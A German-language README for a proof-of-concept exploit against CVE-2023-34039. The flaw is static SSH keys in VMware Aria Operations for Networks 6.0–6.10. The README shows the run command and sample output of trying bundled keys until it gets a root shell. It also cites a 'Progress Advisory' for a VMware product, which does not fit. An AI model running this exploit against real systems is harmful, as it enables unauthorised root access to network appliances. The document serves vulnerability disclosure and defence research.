
VMWare Aria Operations for Networks (vRealize Network Insight) Static SSH key RCE (CVE-2023-34039)
PoC für CVE-2023-34039 VMWare Aria Operations for Networks (vRealize Network Insight) RCE über statischen SSH-Schlüssel
Eine Root-Cause-Analyse der Schwachstelle finden Sie in meinem Blog:
https://summoning.team/blog/vmware-vrealize-network-insight-rce-cve-2023-34039/

VMWare Aria Operations for Networks (vRealize Network Insight) hat von Version 6.0 bis 6.10 die SSH-Schlüssel für die Benutzer support und ubuntu nicht neu generiert, wodurch ein Angreifer mit SSH-Zugriff Zugriff auf die root-Shell dieses Produkts erlangen konnte.
Dieses Problem wurde VMWare von Harsh Jaiswal (@rootxharsh) und Rahul Maini (@iamnoooob) bei ProjectDiscovery Research gemeldet.
Ich habe nur den Exploit geschrieben, wenn man ihn so nennen kann, denn es ist im Grunde ein SSH-Befehls-Wrapper.
python CVE-2023-34039.py --target 192.168.1.16
(!) VMWare Aria Operations for Networks (vRealize Network Insight) Static SSH key RCE (CVE-2023-34039)
(*) Exploit by Sina Kheirkhah (@SinSinology) of Summoning Team (@SummoningTeam)
(*) Trying key: keys/vrni-6.2.0/id_rsa_vnera_keypair_6.2.0_collector
(*) Trying key: keys/vrni-6.2.0/id_rsa_vnera_keypair_6.2.0_platform
(*) Trying key: keys/vrni-6.10.0/id_rsa_vnera_keypair_6.10.0_platform
********************************** ATTENTION **********************************
NTP Service is not healthy.
IMPACT: It may affect the proper working of other services.
ACTION: Restore the service using 'ntp' CLI command.
********************************** ATTENTION **********************************
support@vrni-platform-release:~$ sudo -i
root@vrni-platform-release:~# id
uid=0(root) gid=0(root) groups=0(root)
root@vrni-platform-release:~# hostname
vrni-platform-release
root@vrni-platform-release:~#
Aktualisieren Sie auf die neueste Version oder mildern Sie das Risiko, indem Sie den Anweisungen im Progress Advisory folgen.
Diese Software wurde ausschließlich für Zwecke der akademischen Forschung und zur Entwicklung effektiver Verteidigungstechniken erstellt und ist nicht dafür gedacht, Systeme anzugreifen, außer wenn dies ausdrücklich autorisiert ist. Die Projektbetreuer sind nicht verantwortlich oder haftbar für den Missbrauch der Software. Nutzen Sie sie verantwortungsbewusst.